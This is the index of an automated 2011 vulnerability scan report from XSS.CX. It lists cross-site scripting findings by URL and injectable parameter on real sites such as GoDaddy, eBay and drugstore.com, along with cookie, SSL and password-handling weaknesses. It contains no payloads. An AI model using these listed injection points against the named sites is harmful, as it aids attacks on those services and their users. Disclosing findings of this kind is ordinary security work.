XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09162011-01 Report generated by XSS.CX at Fri Sep 16 19:24:02 CDT 2011. Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler | Loading
1. Cross-site scripting (stored)
2. Cross-site scripting (reflected)
2.1. http://a.collective-media.net/adj/ds.home/default [REST URL parameter 2]
2.2. http://a.collective-media.net/adj/ds.home/default [REST URL parameter 3]
2.3. http://a.collective-media.net/adj/ds.home/default [cmn parameter]
2.4. http://a.collective-media.net/adj/ds.home/default [name of an arbitrarily supplied request parameter]
2.5. http://a.collective-media.net/cmadj/ds.home/default [REST URL parameter 1]
2.6. http://a.collective-media.net/cmadj/ds.home/default [REST URL parameter 2]
2.7. http://a.collective-media.net/cmadj/ds.home/default [REST URL parameter 3]
2.8. http://a.collective-media.net/cmadj/ds.home/default [cmn parameter]
2.9. http://event.adxpose.com/event.flow [uid parameter]
2.10. http://livechat.iadvize.com/rpc/referrer.php [get parameter]
2.11. http://livechat.iadvize.com/rpc/referrer.php [get parameter]
2.12. https://login.secureserver.net/js.php [name of an arbitrarily supplied request parameter]
2.13. https://login.secureserver.net/js.php [r parameter]
2.14. http://rover.ebay.com/ar/1/711-53200-19255-108/1 [REST URL parameter 3]
2.15. http://rover.ebay.com/ar/1/711-53200-19255-108/1 [mpvc parameter]
2.16. http://rover.ebay.com/ar/1/711-53200-19255-108/1 [name of an arbitrarily supplied request parameter]
2.17. http://srv.healthheadlines.com/s.php [k parameter]
2.18. http://srv.healthheadlines.com/s.php [name of an arbitrarily supplied request parameter]
2.19. http://t.tellapart.com/hif [p parameter]
2.20. http://widgets.digg.com/buttons/count [url parameter]
2.21. http://widgetsplus.com/google_plus_widget.php [bbc parameter]
2.22. http://widgetsplus.com/google_plus_widget.php [bbgc parameter]
2.23. http://widgetsplus.com/google_plus_widget.php [bc parameter]
2.24. http://widgetsplus.com/google_plus_widget.php [bfc parameter]
2.25. http://widgetsplus.com/google_plus_widget.php [bmobc parameter]
2.26. http://widgetsplus.com/google_plus_widget.php [bmoc parameter]
2.27. http://widgetsplus.com/google_plus_widget.php [bmofc parameter]
2.28. http://widgetsplus.com/google_plus_widget.php [bw parameter]
2.29. http://widgetsplus.com/google_plus_widget.php [fs parameter]
2.30. http://widgetsplus.com/google_plus_widget.php [host parameter]
2.31. http://widgetsplus.com/google_plus_widget.php [mbc parameter]
2.32. http://widgetsplus.com/google_plus_widget.php [mbgc parameter]
2.33. http://widgetsplus.com/google_plus_widget.php [name of an arbitrarily supplied request parameter]
2.34. http://widgetsplus.com/google_plus_widget.php [nc parameter]
2.35. http://widgetsplus.com/google_plus_widget.php [pc parameter]
2.36. http://widgetsplus.com/google_plus_widget.php [t parameter]
2.37. http://widgetsplus.com/google_plus_widget.php [tc parameter]
2.38. http://widgetsplus.com/google_plus_widget.php [tlc parameter]
2.39. http://ws.amazon.com/widgets/q [InstanceId parameter]
2.40. http://ws.amazon.com/widgets/q [rt parameter]
2.41. http://www.drugstore.com/ [name of an arbitrarily supplied request parameter]
2.42. http://www.drugstore.com/pharmacy/drugindex/rxsearch.asp [name of an arbitrarily supplied request parameter]
2.43. http://www.godaddy.com/Domains/Controls/JsonContent/DotTypePricing.aspx [callback parameter]
2.44. http://www.godaddy.com/external/json/PcSetData.aspx [callback parameter]
2.45. http://www.godaddy.com/offers/jsoncontent/recommendedoffers.aspx [callback parameter]
2.46. http://www.powermta.port25.com/ [name of an arbitrarily supplied request parameter]
2.47. http://www.powermta.port25.com/download-a-white-paper/ [REST URL parameter 1]
2.48. http://www.powermta.port25.com/download-a-white-paper/ [name of an arbitrarily supplied request parameter]
2.49. http://www.powermta.port25.com/smtp-server-software-2/ [REST URL parameter 1]
2.50. http://www.powermta.port25.com/smtp-server-software-2/ [gclid parameter]
2.51. http://www.powermta.port25.com/smtp-server-software-2/ [name of an arbitrarily supplied request parameter]
2.52. http://www.powermta.port25.com/wp-content/themes/powermta1/images/about-logo.gif [REST URL parameter 1]
2.53. http://www.powermta.port25.com/wp-content/themes/powermta1/images/about-logo.gif [REST URL parameter 2]
2.54. http://www.powermta.port25.com/wp-content/themes/powermta1/images/about-logo.gif [REST URL parameter 3]
2.55. http://www.powermta.port25.com/wp-content/themes/powermta1/images/about-logo.gif [REST URL parameter 4]
2.56. http://www.powermta.port25.com/wp-content/themes/powermta1/images/about-logo.gif [REST URL parameter 5]
2.57. http://www.powermta.port25.com/wp-content/themes/powermta1/images/about-logo.gif [name of an arbitrarily supplied request parameter]
2.58. http://www.powermta.port25.com/wp-content/themes/powermta1/images/face-logo.gif [REST URL parameter 1]
2.59. http://www.powermta.port25.com/wp-content/themes/powermta1/images/face-logo.gif [REST URL parameter 2]
2.60. http://www.powermta.port25.com/wp-content/themes/powermta1/images/face-logo.gif [REST URL parameter 3]
2.61. http://www.powermta.port25.com/wp-content/themes/powermta1/images/face-logo.gif [REST URL parameter 4]
2.62. http://www.powermta.port25.com/wp-content/themes/powermta1/images/face-logo.gif [REST URL parameter 5]
2.63. http://www.powermta.port25.com/wp-content/themes/powermta1/images/face-logo.gif [name of an arbitrarily supplied request parameter]
2.64. http://www.powermta.port25.com/wp-content/themes/powermta1/images/favicon.ico [REST URL parameter 5]
2.65. http://www.powermta.port25.com/wp-content/themes/powermta1/images/headerimg.jpg [REST URL parameter 1]
2.66. http://www.powermta.port25.com/wp-content/themes/powermta1/images/headerimg.jpg [REST URL parameter 2]
2.67. http://www.powermta.port25.com/wp-content/themes/powermta1/images/headerimg.jpg [REST URL parameter 3]
2.68. http://www.powermta.port25.com/wp-content/themes/powermta1/images/headerimg.jpg [REST URL parameter 4]
2.69. http://www.powermta.port25.com/wp-content/themes/powermta1/images/headerimg.jpg [REST URL parameter 5]
2.70. http://www.powermta.port25.com/wp-content/themes/powermta1/images/headerimg.jpg [name of an arbitrarily supplied request parameter]
2.71. http://www.powermta.port25.com/wp-content/themes/powermta1/images/in-logo.gif [REST URL parameter 1]
2.72. http://www.powermta.port25.com/wp-content/themes/powermta1/images/in-logo.gif [REST URL parameter 2]
2.73. http://www.powermta.port25.com/wp-content/themes/powermta1/images/in-logo.gif [REST URL parameter 3]
2.74. http://www.powermta.port25.com/wp-content/themes/powermta1/images/in-logo.gif [REST URL parameter 4]
2.75. http://www.powermta.port25.com/wp-content/themes/powermta1/images/in-logo.gif [REST URL parameter 5]
2.76. http://www.powermta.port25.com/wp-content/themes/powermta1/images/in-logo.gif [name of an arbitrarily supplied request parameter]
2.77. http://www.powermta.port25.com/wp-content/themes/powermta1/images/phone-number.gif [REST URL parameter 1]
2.78. http://www.powermta.port25.com/wp-content/themes/powermta1/images/phone-number.gif [REST URL parameter 2]
2.79. http://www.powermta.port25.com/wp-content/themes/powermta1/images/phone-number.gif [REST URL parameter 3]
2.80. http://www.powermta.port25.com/wp-content/themes/powermta1/images/phone-number.gif [REST URL parameter 4]
2.81. http://www.powermta.port25.com/wp-content/themes/powermta1/images/phone-number.gif [REST URL parameter 5]
2.82. http://www.powermta.port25.com/wp-content/themes/powermta1/images/phone-number.gif [name of an arbitrarily supplied request parameter]
2.83. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png [REST URL parameter 1]
2.84. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png [REST URL parameter 2]
2.85. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png [REST URL parameter 3]
2.86. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png [REST URL parameter 4]
2.87. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png [REST URL parameter 5]
2.88. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png [name of an arbitrarily supplied request parameter]
2.89. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-logo.png [REST URL parameter 1]
2.90. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-logo.png [REST URL parameter 2]
2.91. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-logo.png [REST URL parameter 3]
2.92. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-logo.png [REST URL parameter 4]
2.93. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-logo.png [REST URL parameter 5]
2.94. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-logo.png [name of an arbitrarily supplied request parameter]
2.95. http://www.powermta.port25.com/wp-content/themes/powermta1/images/submit_btn.png [REST URL parameter 1]
2.96. http://www.powermta.port25.com/wp-content/themes/powermta1/images/submit_btn.png [REST URL parameter 2]
2.97. http://www.powermta.port25.com/wp-content/themes/powermta1/images/submit_btn.png [REST URL parameter 3]
2.98. http://www.powermta.port25.com/wp-content/themes/powermta1/images/submit_btn.png [REST URL parameter 4]
2.99. http://www.powermta.port25.com/wp-content/themes/powermta1/images/submit_btn.png [REST URL parameter 5]
2.100. http://www.powermta.port25.com/wp-content/themes/powermta1/images/submit_btn.png [name of an arbitrarily supplied request parameter]
2.101. http://www.powermta.port25.com/wp-content/themes/powermta1/images/tag-line.jpg [REST URL parameter 1]
2.102. http://www.powermta.port25.com/wp-content/themes/powermta1/images/tag-line.jpg [REST URL parameter 2]
2.103. http://www.powermta.port25.com/wp-content/themes/powermta1/images/tag-line.jpg [REST URL parameter 3]
2.104. http://www.powermta.port25.com/wp-content/themes/powermta1/images/tag-line.jpg [REST URL parameter 4]
2.105. http://www.powermta.port25.com/wp-content/themes/powermta1/images/tag-line.jpg [REST URL parameter 5]
2.106. http://www.powermta.port25.com/wp-content/themes/powermta1/images/tag-line.jpg [name of an arbitrarily supplied request parameter]
2.107. http://www.powermta.port25.com/wp-content/themes/powermta1/images/twit-logo.gif [REST URL parameter 1]
2.108. http://www.powermta.port25.com/wp-content/themes/powermta1/images/twit-logo.gif [REST URL parameter 2]
2.109. http://www.powermta.port25.com/wp-content/themes/powermta1/images/twit-logo.gif [REST URL parameter 3]
2.110. http://www.powermta.port25.com/wp-content/themes/powermta1/images/twit-logo.gif [REST URL parameter 4]
2.111. http://www.powermta.port25.com/wp-content/themes/powermta1/images/twit-logo.gif [REST URL parameter 5]
2.112. http://www.powermta.port25.com/wp-content/themes/powermta1/images/twit-logo.gif [name of an arbitrarily supplied request parameter]
2.113. http://www.powermta.port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js [REST URL parameter 1]
2.114. http://www.powermta.port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js [REST URL parameter 2]
2.115. http://www.powermta.port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js [REST URL parameter 3]
2.116. http://www.powermta.port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js [REST URL parameter 4]
2.117. http://www.powermta.port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js [REST URL parameter 5]
2.118. http://www.powermta.port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js [name of an arbitrarily supplied request parameter]
2.119. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js [REST URL parameter 1]
2.120. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js [REST URL parameter 2]
2.121. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js [REST URL parameter 3]
2.122. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js [REST URL parameter 4]
2.123. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js [REST URL parameter 5]
2.124. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js [name of an arbitrarily supplied request parameter]
2.125. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js [REST URL parameter 1]
2.126. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js [REST URL parameter 2]
2.127. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js [REST URL parameter 3]
2.128. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js [REST URL parameter 4]
2.129. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js [REST URL parameter 5]
2.130. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js [name of an arbitrarily supplied request parameter]
2.131. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js [REST URL parameter 1]
2.132. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js [REST URL parameter 2]
2.133. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js [REST URL parameter 3]
2.134. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js [REST URL parameter 4]
2.135. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js [REST URL parameter 5]
2.136. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js [name of an arbitrarily supplied request parameter]
2.137. http://www.powermta.port25.com/wp-content/themes/powermta1/scripts/rsv.js [REST URL parameter 1]
2.138. http://www.powermta.port25.com/wp-content/themes/powermta1/scripts/rsv.js [REST URL parameter 2]
2.139. http://www.powermta.port25.com/wp-content/themes/powermta1/scripts/rsv.js [REST URL parameter 3]
2.140. http://www.powermta.port25.com/wp-content/themes/powermta1/scripts/rsv.js [REST URL parameter 4]
2.141. http://www.powermta.port25.com/wp-content/themes/powermta1/scripts/rsv.js [REST URL parameter 5]
2.142. http://www.powermta.port25.com/wp-content/themes/powermta1/scripts/rsv.js [name of an arbitrarily supplied request parameter]
2.143. http://www.powermta.port25.com/wp-content/themes/powermta1/style.css [REST URL parameter 1]
2.144. http://www.powermta.port25.com/wp-content/themes/powermta1/style.css [REST URL parameter 2]
2.145. http://www.powermta.port25.com/wp-content/themes/powermta1/style.css [REST URL parameter 3]
2.146. http://www.powermta.port25.com/wp-content/themes/powermta1/style.css [REST URL parameter 4]
2.147. http://www.powermta.port25.com/wp-content/themes/powermta1/style.css [name of an arbitrarily supplied request parameter]
2.148. http://www.smtp.com/ [gclid parameter]
2.149. http://www.smtp.com/ [name of an arbitrarily supplied request parameter]
2.150. http://www.smtp.com/favicon.ico [REST URL parameter 1]
2.151. http://www.smtp.com/jackpot_config [REST URL parameter 1]
2.152. http://www.smtp.com/service-info [REST URL parameter 1]
2.153. http://www.smtp.com/service-info [name of an arbitrarily supplied request parameter]
2.154. http://www.smtp.com/signup [REST URL parameter 1]
2.155. http://www.smtp.com/smtpcom-jackpot-vert.swf [REST URL parameter 1]
2.156. https://www.smtp.com/favicon.ico [REST URL parameter 1]
2.157. https://www.smtp.com/signup [REST URL parameter 1]
2.158. https://www.smtp.com/signup [name of an arbitrarily supplied request parameter]
2.159. http://www.thewhir.com/favicon.ico [REST URL parameter 1]
2.160. http://www.thewhir.com/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites [REST URL parameter 1]
2.161. http://www.thewhir.com/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites [REST URL parameter 1]
2.162. http://www.ubm.com/en/people/ubm-people.aspx [body_0%24main_0%24ctl02%24ctl01%24ctl00 parameter]
2.163. http://www.ubm.com/en/site-services/search/search-result.aspx [Domain parameter]
2.164. http://www.ubm.com/en/site-services/search/search-result.aspx [name of an arbitrarily supplied request parameter]
2.165. http://www.ubmlive.com/image/image_gallery [groupId parameter]
2.166. http://www.ubmlive.com/image/image_gallery [uuid parameter]
2.167. http://www.zoomerang.com/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7 [bc parameter]
2.168. http://www.zoomerang.com/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7 [bgc parameter]
2.169. http://www.zoomerang.com/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7 [fc parameter]
2.170. http://www.zoomerang.com/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7 [fs parameter]
2.171. http://www.zoomerang.com/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7 [width parameter]
2.172. http://livechat.iadvize.com/chat_init.js [Referer HTTP header]
2.173. http://a.collective-media.net/cmadj/ds.home/default [cli cookie]
2.174. http://livechat.iadvize.com/chat_init.js [vuid cookie]
2.175. https://support.socketlabs.com/index.php/Base/User/Login [SWIFT_client cookie]
2.176. https://support.socketlabs.com/index.php/Base/UserRegistration/Register [SWIFT_client cookie]
2.177. https://support.socketlabs.com/index.php/Base/UserRegistration/RegisterSubmit [SWIFT_client cookie]
2.178. https://support.socketlabs.com/rss [SWIFT_client cookie]
2.179. https://support.socketlabs.com/rss/ [SWIFT_client cookie]
2.180. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]
3. Flash cross-domain policy
3.1. http://imagesak.securepaynet.net/crossdomain.xml
3.2. http://widget.uservoice.com/crossdomain.xml
3.3. http://googleads.g.doubleclick.net/crossdomain.xml
3.4. http://static.ak.fbcdn.net/crossdomain.xml
3.5. http://www.facebook.com/crossdomain.xml
4. Cleartext submission of password
4.1. http://shoprunner.force.com/content/JsContentElementsDRGS
4.2. http://www.thewhir.com/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites
5. SSL cookie without secure flag set
5.1. https://email.secureserver.net/
5.2. https://portal.opera.com/accounts/login/
5.3. https://www.smtp.com/signup
5.4. https://idp.godaddy.com/login.aspx
5.5. https://idp.godaddy.com/retrieveaccount.aspx
5.6. https://idp.godaddy.com/shopper_new.aspx
5.7. https://mya.godaddy.com/Default.aspx
5.8. https://mya.godaddy.com/myrenewals/myRenewals.aspx
5.9. https://www.jangosmtp.com/login.asp
6. Session token in URL
6.1. http://l.sharethis.com/pview
6.2. http://lb-static1-1568763564.us-east-1.elb.amazonaws.com/pix.gif
6.3. http://player.ooyala.com/sas/authorized
6.4. http://www.apture.com/js/apture.js
7. SSL certificate
7.1. https://login.secureserver.net/
7.2. https://email.secureserver.net/
7.3. https://fonts.googleapis.com/
7.4. https://idp.godaddy.com/
7.5. https://livechat.iadvize.com/
7.6. https://mya.godaddy.com/
7.7. https://www.google.com/
8. Password field submitted using GET method
9. ASP.NET ViewState without MAC enabled
9.1. http://go.icontact.com/SEM/AP
9.2. http://go.icontact.com/SEM/AP/free-30-day-trial-20J6-1725H4.html
9.3. http://go.icontact.com/SEM/AP/home-20J6-17231V.html
10. Cookie scoped to parent domain
10.1. http://mct.rkdms.com/sid.gif
10.2. http://www.amazon.com/gp/loader/jsonp
10.3. http://amch.questionmarket.com/adsc/d887846/17/909940/adscout.php
10.4. http://amch.questionmarket.com/adsc/d922317/2/43977402/decide.php
10.5. http://apis.google.com/js/plusone.js
10.6. http://b.scorecardresearch.com/b
10.7. http://bstats.adbrite.com/click/bstats.gif
10.8. http://go.icontact.com/SEM/AP
10.9. http://go.icontact.com/SEM/AP/free-30-day-trial-20J6-1725H4.html
10.10. http://go.icontact.com/SEM/AP/home-20J6-17231V.html
10.11. http://ib.adnxs.com/mapuid
10.12. http://ib.adnxs.com/seg
10.13. http://id.google.com/verify/EAAAAM3m5M-5VWJq99izgRISSwA.gif
10.14. https://idp.godaddy.com/login.aspx
10.15. https://idp.godaddy.com/retrieveaccount.aspx
10.16. https://idp.godaddy.com/shopper_new.aspx
10.17. http://img.godaddy.com/image.aspx
10.18. http://img.godaddy.com/image.aspx
10.19. http://img.godaddy.com/pageevents.aspx
10.20. http://img.secureserver.net/image.aspx
10.21. http://landing.sendgrid.com/smtp-with-bullet-points/
10.22. http://load.exelator.com/load/
10.23. https://mya.godaddy.com/Default.aspx
10.24. https://mya.godaddy.com/myrenewals/myRenewals.aspx
10.25. http://p.brilig.com/contact/bct
10.26. http://pixel.quantserve.com/seg/r
10.27. http://pixel.rubiconproject.com/tap.php
10.28. http://rover.ebay.com/ar/1/711-53200-19255-108/1
10.29. http://s.amazon-cornerstone.com/iui3
10.30. http://srv.healthheadlines.com/s.php
10.31. http://t.tellapart.com/hif
10.32. http://t.tellapart.com/tpv
10.33. http://tags.bluekai.com/site/2731
10.34. http://www.drugstore.com/
10.35. http://www.drugstore.com/pharmacy/drugindex/rxsearch.asp
10.36. http://www.drugstore.com/search/search_results.asp
10.37. http://www.godaddy.com/
10.38. http://www.godaddy.com/Domains/Controls/JsonContent/DotTypePricing.aspx
10.39. http://www.godaddy.com/Domains/Controls/JsonContent/generalPricing.aspx
10.40. http://www.godaddy.com/domains/search.aspx
10.41. http://www.godaddy.com/gdshop/site_search.asp
10.42. http://www.godaddy.com/offers/hot-deals.aspx
10.43. http://www.godaddy.com/offers/hot-deals2.aspx
10.44. http://www.godaddy.com/offers/jsoncontent/recommendedoffers.aspx
10.45. http://www.godaddy.com/productadvisor/pastart.aspx
10.46. http://www.godaddy.com/productadvisor/productadvisor.aspx
11. Cookie without HttpOnly flag set
11.1. http://ads.adxpose.com/ads/ads.js
11.2. https://email.secureserver.net/
11.3. http://event.adxpose.com/event.flow
11.4. http://img.godaddy.com/image.aspx
11.5. http://img.godaddy.com/image.aspx
11.6. http://img.godaddy.com/pageevents.aspx
11.7. http://img.secureserver.net/image.aspx
11.8. http://mct.rkdms.com/sid.gif
11.9. http://portal.opera.com/
11.10. http://portal.opera.com/portal/tabs/
11.11. https://portal.opera.com/accounts/login/
11.12. http://tracking.searchmarketing.com/welcome.asp
11.13. http://www.amazon.com/gp/loader/jsonp
11.14. http://www.conversionruler.com/bin/tracker.php
11.15. http://www.ubmlive.com/image/image_gallery
11.16. http://ad.yieldmanager.com/pixel
11.17. http://amch.questionmarket.com/adsc/d887846/17/909940/adscout.php
11.18. http://amch.questionmarket.com/adsc/d922317/2/43977402/decide.php
11.19. http://apis.google.com/js/plusone.js
11.20. http://b.scorecardresearch.com/b
11.21. http://bstats.adbrite.com/click/bstats.gif
11.22. http://d.adroll.com/check/4LZ2WHLFKZGJBDJQYVBYXX/USFQSVPCUNEC3MWWKVX6RH/NQ5TTRI2MVGQHFZLQL6SMW
11.23. http://d.adroll.com/pixel/4LZ2WHLFKZGJBDJQYVBYXX/USFQSVPCUNEC3MWWKVX6RH
11.24. http://drugstore.com/
11.25. http://go.icontact.com/SEM/AP
11.26. http://go.icontact.com/SEM/AP/free-30-day-trial-20J6-1725H4.html
11.27. http://go.icontact.com/SEM/AP/home-20J6-17231V.html
11.28. http://ib.mookie1.com/image.sbix
11.29. https://idp.godaddy.com/login.aspx
11.30. https://idp.godaddy.com/retrieveaccount.aspx
11.31. https://idp.godaddy.com/shopper_new.aspx
11.32. http://landing.sendgrid.com/smtp-with-bullet-points/
11.33. http://livechat.iadvize.com/chat_init.js
11.34. http://livechat.iadvize.com/rpc/referrer.php
11.35. http://load.exelator.com/load/
11.36. https://mya.godaddy.com/Default.aspx
11.37. https://mya.godaddy.com/myrenewals/myRenewals.aspx
11.38. http://p.brilig.com/contact/bct
11.39. http://pixel.quantserve.com/seg/r
11.40. http://pixel.rubiconproject.com/tap.php
11.41. http://powermta1.com/wp-content/plugins/cforms/styling/sidebar-layout.css
11.42. http://rover.ebay.com/ar/1/711-53200-19255-108/1
11.43. http://s.amazon-cornerstone.com/iui3
11.44. http://t.tellapart.com/hif
11.45. http://t.tellapart.com/tpv
11.46. http://t5.trackalyzer.com/trackalyze.asp
11.47. http://tags.bluekai.com/site/2731
11.48. http://thefavicongallery.com/h/u/hugi.is.ico
11.49. http://tracking.waterfrontmedia.com/GCScript.ashx
11.50. http://united-business-media-plc.production.investis.com/en/stylesheets/~/media/Images/U/United-Business-Media-Plc/Images/css/footer-link-sep.jpg
11.51. http://www.blackbaud.com/
11.52. http://www.drugstore.com/
11.53. http://www.drugstore.com/LookAheadSuggestions.aspx
11.54. http://www.drugstore.com/pharmacy/drugindex/rxsearch.asp
11.55. http://www.drugstore.com/search/search_results.asp
11.56. http://www.godaddy.com/
11.57. http://www.godaddy.com/Domains/Controls/JsonContent/DotTypePricing.aspx
11.58. http://www.godaddy.com/Domains/Controls/JsonContent/generalPricing.aspx
11.59. http://www.godaddy.com/domains/search.aspx
11.60. http://www.godaddy.com/gdshop/site_search.asp
11.61. http://www.godaddy.com/offers/hot-deals.aspx
11.62. http://www.godaddy.com/offers/hot-deals2.aspx
11.63. http://www.godaddy.com/offers/jsoncontent/recommendedoffers.aspx
11.64. http://www.godaddy.com/productadvisor/pastart.aspx
11.65. http://www.godaddy.com/productadvisor/productadvisor.aspx
11.66. http://www.googleadservices.com/pagead/aclk
11.67. http://www.jangosmtp.com/Free-Account.asp
11.68. https://www.jangosmtp.com/login.asp
11.69. http://www.opera.com/company/
11.70. http://www.ubm.com/en/javascripts/cache.js
11.71. http://www.ubm.com/en/javascripts/gatag.js
11.72. http://www.ubm.com/en/javascripts/menu.js
11.73. http://www.ubm.com/en/javascripts/search-box.js
11.74. http://www.ubm.com/en/javascripts/sifr3.js
11.75. http://www.ubm.com/en/javascripts/snapdown.js
11.76. http://www.ubm.com/en/javascripts/snapwithinsnap.js
11.77. http://www.ubm.com/en/site-services/search/~/media/Images/U/United-Business-Media-Plc/Images/content/logo.png
11.78. http://www.ubm.com/en/site-services/search/~/media/Images/U/United-Business-Media-Plc/Images/css/favicon.jpg
11.79. http://www.ubm.com/javascripts/gatag.js
11.80. http://www.ubm.com/javascripts/sitecatalyst.js
12. Password field with autocomplete enabled
12.1. https://dev.opera.com/login/
12.2. https://dev.opera.com/login/wronglogin.dml
12.3. https://idp.godaddy.com/login.aspx
12.4. https://idp.godaddy.com/login.aspx
12.5. https://idp.godaddy.com/login.aspx
12.6. https://idp.godaddy.com/retrieveaccount.aspx
12.7. https://idp.godaddy.com/shopper_new.aspx
12.8. https://idp.godaddy.com/shopper_new.aspx
12.9. https://login.secureserver.net/
12.10. https://login.secureserver.net/
12.11. https://login.secureserver.net/
12.12. https://my.opera.com/community/signup/
12.13. https://mya.godaddy.com/Default.aspx
12.14. https://mya.godaddy.com/myrenewals/myRenewals.aspx
12.15. https://portal.opera.com/accounts/login/
12.16. https://sendgrid.com/user/signup/package/44
12.17. http://shoprunner.force.com/content/JsContentElementsDRGS
12.18. https://support.socketlabs.com/
12.19. https://support.socketlabs.com/index.php/Base/User/Login
12.20. https://support.socketlabs.com/index.php/Base/UserRegistration/Register
12.21. https://support.socketlabs.com/index.php/Base/UserRegistration/Register
12.22. https://support.socketlabs.com/index.php/Base/UserRegistration/RegisterSubmit
12.23. https://support.socketlabs.com/index.php/Base/UserRegistration/RegisterSubmit
12.24. http://www.godaddy.com/
12.25. http://www.godaddy.com/domains/search.aspx
12.26. http://www.godaddy.com/gdshop/site_search.asp
12.27. http://www.godaddy.com/offers/hot-deals2.aspx
12.28. http://www.godaddy.com/productadvisor/pastart.aspx
12.29. http://www.jangosmtp.com/login.asp
12.30. https://www.jangosmtp.com/login.asp
12.31. https://www.smtp.com/signup
12.32. http://www.thewhir.com/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites
13. Referer-dependent response
14. Cross-domain POST
15. Cross-domain Referer leakage
15.1. http://a.collective-media.net/cmadj/ds.home/default
15.2. http://ad.doubleclick.net/adj/inet.whir/news
15.3. http://ad.doubleclick.net/adj/inet.whir/news
15.4. http://ad.doubleclick.net/adj/inet.whir/news
15.5. http://ad.doubleclick.net/adj/inet.whir/news
15.6. http://ad.doubleclick.net/adj/inet.whir/news
15.7. http://ad.doubleclick.net/adj/inet.whir/news
15.8. http://ad.doubleclick.net/adj/inet.whir/news
15.9. http://ad.doubleclick.net/adj/inet.whir/news
15.10. http://cdn.sendgrid.com/js/sg.gz.js
15.11. http://cm.g.doubleclick.net/pixel
15.12. http://cm.g.doubleclick.net/pixel
15.13. http://cm.g.doubleclick.net/pixel
15.14. https://dev.opera.com/login/wronglogin.dml
15.15. http://go.icontact.com/SEM/AP
15.16. http://googleads.g.doubleclick.net/pagead/ads
15.17. http://googleads.g.doubleclick.net/pagead/ads
15.18. http://googleads.g.doubleclick.net/pagead/ads
15.19. http://googleads.g.doubleclick.net/pagead/ads
15.20. http://googleads.g.doubleclick.net/pagead/ads
15.21. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071433059/
15.22. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072356810/
15.23. http://help.securepaynet.net/topic/168/article/5246
15.24. https://idp.godaddy.com/login.aspx
15.25. https://idp.godaddy.com/retrieveaccount.aspx
15.26. https://idp.godaddy.com/shopper_new.aspx
15.27. http://landing.sendgrid.com/smtp-with-bullet-points/
15.28. http://mediacdn.disqus.com/1316112938/build/system/disqus.js
15.29. https://my.opera.com/community/signup/
15.30. https://mya.godaddy.com/Default.aspx
15.31. https://mya.godaddy.com/myrenewals/myRenewals.aspx
15.32. http://player.ooyala.com/player.js
15.33. http://portal.opera.com/portal/tabs/
15.34. http://portal.opera.com/portal/tabs/
15.35. http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
15.36. http://powermta1.com/wp-content/plugins/cforms/styling/sidebar-layout.css
15.37. http://rover.ebay.com/ar/1/711-53200-19255-108/1
15.38. http://search.altn.com/search
15.39. http://seg.sharethis.com/getSegment.php
15.40. http://sendgrid.com/pricing.html
15.41. http://srv.healthheadlines.com/s.php
15.42. http://t.tellapart.com/hif
15.43. http://tag.admeld.com/id
15.44. http://tag.admeld.com/id
